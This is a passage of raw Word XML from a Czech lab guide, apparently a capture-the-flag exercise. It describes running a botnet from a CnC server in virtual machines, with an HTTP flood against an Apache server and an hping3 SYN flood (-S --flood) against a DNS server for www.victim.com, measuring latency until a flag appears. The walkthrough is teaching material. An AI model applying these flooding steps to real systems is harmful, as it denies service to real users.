                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3217293" cy="2333596"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C80B2B" w14:textId="4F0760B2" w:rsidR="00803F62" w:rsidRDefault="00257DB5" w:rsidP="00803F62">
      <w:r>
        <w:t xml:space="preserve">Před spuštěním na chvíli přejmenujeme/vymažeme payloadcheck.py, aby se nám nespustil útok předtím, než chceme. </w:t>
      </w:r>
      <w:r w:rsidR="00941DD4">
        <w:t>Následně po spuštění musíme každému změnit IP adresu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (stačí inkrementovat o 1 nahoru)</w:t>
      </w:r>
      <w:r w:rsidR="008F0D71">
        <w:t xml:space="preserve"> a pro jistotu deaktivovat a aktivovat rozhraní.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5155E648" w14:textId="0DA96F19" w:rsidR="00257DB5" w:rsidRDefault="00257DB5" w:rsidP="00803F62">
      <w:r w:rsidRPr="00257DB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3817B872" wp14:editId="29CA0F31">
            <wp:extent cx="4001243" cy="1749287"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="26896584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65840" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4013614" cy="1754696"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CF972" w14:textId="5C2D5FC0" w:rsidR="008F0D71" w:rsidRDefault="008F0D71" w:rsidP="00803F62">
      <w:r w:rsidRPr="008F0D71">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BF3F83" wp14:editId="6AF45A9B">
            <wp:extent cx="3591426" cy="1038370"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="128741312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13124" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3591426" cy="1038370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B4CC6" w14:textId="7065C540" w:rsidR="00257DB5" w:rsidRDefault="00257DB5" w:rsidP="008F0D71">
      <w:r>
        <w:t xml:space="preserve">Takže </w:t>
      </w:r>
      <w:r w:rsidR="00B6791D">
        <w:t xml:space="preserve">nakonec </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bychom měli mít boty s adresami 192.1.1.11-16. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E307A" w14:textId="07F280FA" w:rsidR="008F0D71" w:rsidRDefault="008F0D71" w:rsidP="008F0D71">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:t>Krok 3. Útok a jeho dopad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A6949" w14:textId="05577B52" w:rsidR="008F0D71" w:rsidRDefault="00B6791D" w:rsidP="008F0D71">
      <w:r>
        <w:t xml:space="preserve">Na Kali jsou připraveny dva scripty na měření odezvy: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B6791D">
        <w:t xml:space="preserve">httpcheck_of_delay_external.py </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6791D">
        <w:t xml:space="preserve"> tcpcheck_of_delay_external.py</w:t>
      </w:r>
      <w:r>
        <w:t>. Každý pro jeden scénář.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742A6D7" w14:textId="16D98284" w:rsidR="00B6791D" w:rsidRDefault="00B6791D" w:rsidP="008F0D71">
      <w:r>
        <w:t xml:space="preserve">Po naklonování a </w:t>
      </w:r>
      <w:r w:rsidR="005D127F">
        <w:t>ujištění, že v payloadcheck.py je zkopírovaný payload_http_test.py</w:t>
      </w:r>
      <w:r w:rsidR="00762A52">
        <w:t xml:space="preserve"> a stále jde vyhledat adresa Apache serveru</w:t>
      </w:r>
      <w:r w:rsidR="005D127F">
        <w:t xml:space="preserve"> můžeme zapnout</w:t>
      </w:r>
      <w:r w:rsidR="00762A52">
        <w:t xml:space="preserve"> script na měření odezvy a zapnout naše naklonované stroje</w:t>
      </w:r>
      <w:r w:rsidR="005D127F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66085C47" w14:textId="3170B847" w:rsidR="00257DB5" w:rsidRDefault="005D127F" w:rsidP="00762A52">
      <w:r>
        <w:t>Příkazem „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> systemctl status &lt;service&gt;“ (u CnC je </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startupbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a startup, v botnetu je listen a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beacon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) můžeme dále zkontrolovat, jestli vše proběhlo v pořádku.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BBC3FD" w14:textId="3D2A2BCA" w:rsidR="00DF7AF2" w:rsidRDefault="00762A52" w:rsidP="00762A52">
      <w:r>
        <w:t xml:space="preserve">Automaticky by útok měl probíhat a odezva by měla </w:t>
      </w:r>
      <w:r w:rsidR="00DF7AF2">
        <w:t xml:space="preserve">začít </w:t>
      </w:r>
      <w:r>
        <w:t>kolísat</w:t>
      </w:r>
      <w:r w:rsidR="00DF7AF2">
        <w:t>, a nakonec i postupně stoupat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693737CA" w14:textId="46B9E347" w:rsidR="00C10A72" w:rsidRDefault="00C10A72" w:rsidP="00762A52">
      <w:r w:rsidRPr="00C10A72">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6450FAA0" wp14:editId="3E1F824C">
            <wp:extent cx="2368351" cy="2580515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23978415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84159" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2372612" cy="2585158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08E5E0" w14:textId="310B4A70" w:rsidR="0053694F" w:rsidRPr="00AD6C11" w:rsidRDefault="00DF7AF2" w:rsidP="00762A52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Odpozorováno mám, že normální odezva by se měla pohybovat kolem 0.01-0.05s, s prvním útokem se navýší na 0.1-0.15s s druhým na 0.4-0.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se třetím okolo jedné sekundy, kde začíná problém s výpočetní sílou počítače</w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a se čtvrtým útokem se začne pohybovat okolo 1-1.5 sekundy</w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t>. Nakonec při šesti se začneme pohybovat okolo 4 sekund</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t xml:space="preserve">Další zajímavost je, že po 3-5 minutách stálého útoku se server pomalu </w:t>
      </w:r>
      <w:r w:rsidR="00AD6C11">
        <w:t xml:space="preserve">začne zotavovat – při šesti útocích se odezva snížila z </w:t>
      </w:r>
      <w:r w:rsidR="00AD6C11" w:rsidRPr="00AD6C11">
        <w:t>~4 sekund na ~1.5</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB107A" w14:textId="6D610BA7" w:rsidR="00DF7AF2" w:rsidRDefault="00DF7AF2" w:rsidP="00762A52">
      <w:r>
        <w:t xml:space="preserve">Pokud jsme virtuální počítače spouštěli postupně, může se stát, že </w:t>
      </w:r>
      <w:r w:rsidR="00C10A72">
        <w:t>ostatní počítače nemůžou komunikovat s CnC serverem</w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t>, protože síťový provoz se už běžícími útoky zpomalí</w:t>
      </w:r>
      <w:r w:rsidR="00C10A72">
        <w:t xml:space="preserve">, to se dá vyřešit tím, že na chvíli </w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t>smažeme</w:t>
      </w:r>
      <w:r w:rsidR="00C10A72">
        <w:t xml:space="preserve"> na CnC serveru </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C10A72">
        <w:t>payloadcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C10A72">
        <w:t xml:space="preserve"> a re</w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t>startujeme</w:t>
      </w:r>
      <w:r w:rsidR="00C10A72">
        <w:t xml:space="preserve"> boty. Po jejich zapnutí můžeme payload zase dát zpět a spustíme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C10A72">
        <w:t>cnc_ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C10A72">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC7947">
        <w:t xml:space="preserve"> Tím by se </w:t>
      </w:r>
      <w:r w:rsidR="0053694F">
        <w:t>payload měl poslat na všechny zařízení.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2393B" w14:textId="5DBAE26E" w:rsidR="0053694F" w:rsidRDefault="0053694F" w:rsidP="00762A52">
      <w:r w:rsidRPr="0053694F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="658D7B1D" wp14:editId="7FB8E99D">
            <wp:extent cx="3153215" cy="619211"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10433238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23826" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3153215" cy="619211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B64F1A" w14:textId="46B3F889" w:rsidR="0053694F" w:rsidRDefault="0053694F" w:rsidP="00762A52">
      <w:r>
        <w:t>Pokud tedy je útok úspěšný (máme odezvu větší jak nastavenou hodnotu), dostaneme na stránku naši flagu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531BD256" w14:textId="0E8CE5F7" w:rsidR="0053694F" w:rsidRDefault="00AD6C11" w:rsidP="00762A52">
      <w:r w:rsidRPr="00AD6C11">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5EDF84" wp14:editId="6319BEA4">
            <wp:extent cx="4611269" cy="856583"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="54474276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42762" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4630943" cy="860238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB385B2" w14:textId="4711B5D2" w:rsidR="00AD6C11" w:rsidRDefault="00AD6C11" w:rsidP="00AD6C11">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Část </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Scénář </w:t>
      </w:r>
      <w:r>
        <w:t>TCP SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B01D216" w14:textId="36720559" w:rsidR="00AD6C11" w:rsidRDefault="00AD6C11" w:rsidP="00AD6C11">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Krok </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Kontrola</w:t>
      </w:r>
      <w:r w:rsidR="00ED4DEF">
        <w:t xml:space="preserve"> a příprava</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BD51D" w14:textId="4F6FAF20" w:rsidR="00AD6C11" w:rsidRDefault="00AD6C11" w:rsidP="00762A52">
      <w:r>
        <w:t>Jelikož se scénář liší jen v jeho útoku</w:t>
      </w:r>
      <w:r w:rsidR="0057299E">
        <w:t xml:space="preserve"> (používáme Hping3 na místo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0057299E">
        <w:t>Scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0057299E">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a ne </w:t>
      </w:r>
      <w:r w:rsidR="006E0066">
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:r>
        <w:t>topologii</w:t>
      </w:r>
      <w:r w:rsidR="00E75122">
        <w:t>, m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ůžeme použít podobný postup jak u HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> útoku.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AFB95F" w14:textId="1D5A1D76" w:rsidR="00ED4DEF" w:rsidRDefault="00ED4DEF" w:rsidP="00762A52">
      <w:r>
        <w:t>První však ověříme, že DNS server funguje a to tím, že vyhledáme www.victim.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9F0027" w14:textId="20BAEC44" w:rsidR="00AD6C11" w:rsidRDefault="00ED4DEF" w:rsidP="00762A52">
      <w:r w:rsidRPr="00ED4DEF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E06B1DD" wp14:editId="3EB42381">
            <wp:extent cx="3977360" cy="852816"/>
            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
            <wp:docPr id="4937187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8761" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3996299" cy="856877"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D55397" w14:textId="2B18C0A9" w:rsidR="00ED4DEF" w:rsidRDefault="00ED4DEF" w:rsidP="00762A52">
      <w:r>
        <w:t xml:space="preserve">Pokud ano, tak začneme rovnou u CnC serveru, kde stačí změnit obsah </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="0057299E">
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> souboru na obsah payload_tcp_test.py</w:t>
      </w:r>
      <w:r w:rsidR="0057299E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC543D7" w14:textId="5B9DF8DC" w:rsidR="00ED4DEF" w:rsidRDefault="001A1A9C" w:rsidP="00762A52">
      <w:r>
        <w:t xml:space="preserve">Pokud běží minulý útok tak restartujeme každého bota, a po naběhnutí by se měl útok rovnou spustit, </w:t>
      </w:r>
      <w:r w:rsidR="0057299E">
        <w:t xml:space="preserve">nebo </w:t>
      </w:r>
      <w:r>
        <w:t>můžeme znova použít variantu s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cnc_ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695793D7" w14:textId="38A707D3" w:rsidR="00ED4DEF" w:rsidRDefault="00ED4DEF" w:rsidP="00ED4DEF">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Krok </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>. Útok a jeho dopad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B87814" w14:textId="352AAC95" w:rsidR="0057299E" w:rsidRDefault="0057299E" w:rsidP="0057299E">
      <w:r>
        <w:t>Pro ukázku output z botnetu (manuálně zapnut script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400B0476" w14:textId="4C68B023" w:rsidR="0057299E" w:rsidRDefault="0057299E" w:rsidP="0057299E">
      <w:r w:rsidRPr="0057299E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673A100B" wp14:editId="4AA78B45">
            <wp:extent cx="4908589" cy="2525698"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="19550916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1652" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4912216" cy="2527564"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F07DBA6" w14:textId="77777777" w:rsidR="00F5032D" w:rsidRDefault="00F5032D" w:rsidP="00F5032D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Obsah scriptu je podobný, ale vlastně jen určujeme, jak bude vypadat hping3 příkaz. Nedeklarujeme si cílovou IP adresu a port a nastavíme možnosti u </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>příkazu -S</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, jelikož chceme posílat SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> flag a možnost --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pro nejrychlejší zasílaní paketů. Po spuštění, útok zapříčiní, že DNS server portu 53 bude přetížen a neměl by být schopen tak vykonávat jeho službu. Tím pádem normální uživatele, kteří na tuto stránku jdou poprvé (nevědí IP adresu stránky </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="00F76AC3">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>www.victim.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>), nebudou schopni se na stránku dostat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10690409" w14:textId="753E8FB9" w:rsidR="001A1A9C" w:rsidRDefault="00F5032D" w:rsidP="00F5032D">
      <w:r>
        <w:t>Spustíme podobný script na ověření odezvy a po nějaké době by měla hodnota překročit požadovanou hodnotu. Tím se přidá na stránku náš řetězec pro splnění úlohy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE2C29" w14:textId="19ABAA23" w:rsidR="00F5032D" w:rsidRPr="001A1A9C" w:rsidRDefault="00F5032D" w:rsidP="00F5032D">
      <w:r w:rsidRPr="00F17974">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69AACEB7" wp14:editId="58C91FB1">
            <wp:extent cx="3162741" cy="714475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="199965594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5941" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3162741" cy="714475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA66DB" w14:textId="498A9DA4" w:rsidR="00ED4DEF" w:rsidRDefault="001A1A9C" w:rsidP="00762A52">
      <w:r w:rsidRPr="001A1A9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CE6F86" wp14:editId="3B994471">
            <wp:extent cx="6144482" cy="1076475"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1221426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2677" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6144482" cy="1076475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0356F619" w14:textId="792742FB" w:rsidR="00F5032D" w:rsidRDefault="00F5032D" w:rsidP="00762A52">
      <w:r>
        <w:t xml:space="preserve">Pro zajímavost ještě můžete vyzkoušet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nebo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> na serverech, pro další vyobrazení útoků.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECAEE16" w14:textId="777DB742" w:rsidR="00762A52" w:rsidRDefault="00F5032D" w:rsidP="00762A52">
      <w:r w:rsidRPr="0057299E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547801EE" wp14:editId="194FDB80">
            <wp:extent cx="6395085" cy="512445"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
            <wp:docPr id="7508424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42455" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6395085" cy="512445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CCD48F" w14:textId="77777777" w:rsidR="00F5032D" w:rsidRPr="00803F62" w:rsidRDefault="00F5032D" w:rsidP="00762A52"/>
    <w:sectPr w:rsidR="00F5032D" w:rsidRPr="00803F62">
      <w:headerReference w:type="even" r:id="rId53"/>
      <w:footerReference w:type="even" r:id="rId54"/>
      <w:footerReference w:type="default" r:id="rId55"/>
      <w:headerReference w:type="first" r:id="rId56"/>
      <w:footerReference w:type="first" r:id="rId57"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="780" w:right="1089" w:bottom="1312" w:left="1080" w:header="708" w:footer="71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0B37A" w14:textId="77777777" w:rsidR="00AF4DFE" w:rsidRDefault="00AF4DFE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6A7F58DD" w14:textId="77777777" w:rsidR="00AF4DFE" w:rsidRDefault="00AF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29C0" w14:textId="77777777" w:rsidR="00E00C31" w:rsidRDefault="00000000">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="6983"/>
        <w:tab w:val="right" w:pos="10071"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="-12" w:firstLine="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>©</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>2018 - 2020</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">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All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r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
